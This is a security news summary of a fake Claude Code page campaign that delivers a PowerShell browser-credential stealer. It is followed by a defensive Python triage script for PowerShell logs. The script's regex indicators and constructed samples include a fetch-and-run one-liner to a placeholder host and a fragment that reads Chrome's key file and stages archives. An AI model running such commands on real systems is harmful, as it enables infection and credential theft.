Fake Claude Code Page Pushes PowerShell Stealer at Devs

Infosecurity Magazine, May 11, 2026

Why It Matters

The attack bypasses traditional behavioral detection by splitting malicious activity between PowerShell and a stealthy native helper, exposing high‑value developer machines and threatening corporate code and cloud assets.

Key Takeaways

  • Fake Claude Code pages deliver a PowerShell stealer targeting Chromium browsers
  • Loader injects a 4,608‑byte native helper to steal encryption keys via IElevator2
  • Campaign uses split PowerShell/native design to bypass behavioral detection rules
  • Persistence via scheduled task checks region before contacting C2 server
  • Compromised developer workstations can pivot to code repos and cloud environments

Pulse Analysis

The rise of counterfeit installation pages reflects a growing trend where threat actors weaponize developer‑focused tools to gain initial access. By mimicking the official Claude Code documentation and presenting a one‑line PowerShell command, the campaign lures developers searching for AI‑assisted coding assistants. Unlike typical malware that relies on obvious binaries, the malicious script appears clean to URL scanners, allowing it to slip past perimeter defenses that focus on known malicious payloads.

Technical analysis reveals a sophisticated two‑stage approach. The PowerShell loader, obfuscated and roughly 600 KB in size, enumerates all Chromium‑family browsers and injects a 4,608‑byte native helper directly into a live process. This helper leverages the newly introduced IElevator2 COM interface in Chrome 144 to retrieve the App‑Bound Encryption key, a method first seen in the Glove Stealer but refined to avoid any network or cryptographic imports. By confining observable activity—SQLite reads, archive creation and HTTPS exfiltration—to the PowerShell layer, the attackers sidestep behavioral rule sets that monitor native binaries in isolation.

For enterprises, the implications are stark. Developers often possess privileged access to source code repositories, CI/CD pipelines, and cloud credentials; a single compromised workstation can cascade into a full‑scale supply‑chain breach. The campaign’s region‑aware scheduled task further complicates detection, as it silently disables itself in high‑risk geographies. Defenders should enforce PowerShell Constrained Language Mode, enable comprehensive script block logging, and block newly registered domains resembling legitimate developer tools. Proactive web filtering and regular code‑signing verification can also reduce the attack surface, protecting both the development team and the broader organization.
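The script block logging the paragraph recommends only pays off if someone reads the resulting Event ID 4104 text, so here is an added example (not code from the article or from Infosecurity Magazine) that triages logged script blocks for the loader behaviours the summary describes: a download-and-run one-liner, Chromium profile access, process injection, archive staging, scheduled-task persistence and a region check. The indicator regexes, the verdict thresholds and the sample blocks are this editor's assumptions and constructed fixtures, not material from the campaign.

```python
import re

# Each behaviour the summary attributes to the loader, mapped to a regex over the decoded
# script text that PowerShell script block logging (Event ID 4104) records. That logging is
# enabled via the EnableScriptBlockLogging policy value under
# HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging.
INDICATORS = {
    "remote_download_exec": re.compile(
        r"\b(irm|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b[^\n]*\|\s*"
        r"(iex|Invoke-Expression)\b", re.I),
    "chromium_profile_access": re.compile(r"Local State|Login Data|User Data", re.I),
    "process_injection_api": re.compile(r"VirtualAllocEx|WriteProcessMemory|CreateRemoteThread", re.I),
    "archive_staging": re.compile(r"Compress-Archive|ZipFile\]::", re.I),
    "scheduled_task_persistence": re.compile(r"Register-ScheduledTask|schtasks(\.exe)?\s+/create", re.I),
    "region_check": re.compile(r"Get-Culture|Get-WinSystemLocale|Get-WinHomeLocation|GeoId", re.I),
    "encoded_payload": re.compile(r"FromBase64String|-EncodedCommand|[A-Za-z0-9+/]{200,}={0,2}"),
}


def triage_script_block(text: str) -> dict:
    """Match one logged script block against the indicators and assign a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A download-and-run one-liner is the lure itself, so it is enough on its own; otherwise
    # require several loader behaviours to co-occur, since each one alone is common in admin scripts.
    if "remote_download_exec" in hits or len(hits) >= 3:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits}


def triage_all(blocks: dict) -> dict:
    """Verdict per named block, for a batch pulled from the event log."""
    return {name: triage_script_block(text)["verdict"] for name, text in blocks.items()}


# Constructed sample script blocks (assumed shapes, none taken from the campaign).
SAMPLE_BLOCKS = {
    "lure_oneliner": "irm https://docs.example.invalid/install.ps1 | iex",
    "loader_fragment": (
        "$ls = Get-Content \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Local State\"\n"
        "$buf = [Convert]::FromBase64String($blob)\n"
        "Compress-Archive -Path $out -DestinationPath \"$env:TEMP\\p.zip\"\n"
        "if ((Get-Culture).Name -notin $blocked) { Register-ScheduledTask -TaskName Updater -Action $a -Trigger $t }"
    ),
    "nightly_backup": "Register-ScheduledTask -TaskName NightlyBackup -Action $a -Trigger $t",
    "admin_report": "Get-Service | Where-Object Status -eq Running | Export-Csv C:\\temp\\svc.csv",
}

if __name__ == "__main__":
    for name, verdict in triage_all(SAMPLE_BLOCKS).items():
        print(f"{name}: {verdict}")
```

The thresholds deliberately leave a lone scheduled-task registration at "review" rather than "suspicious", because blocking on any single indicator would drown analysts in legitimate administration scripts.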
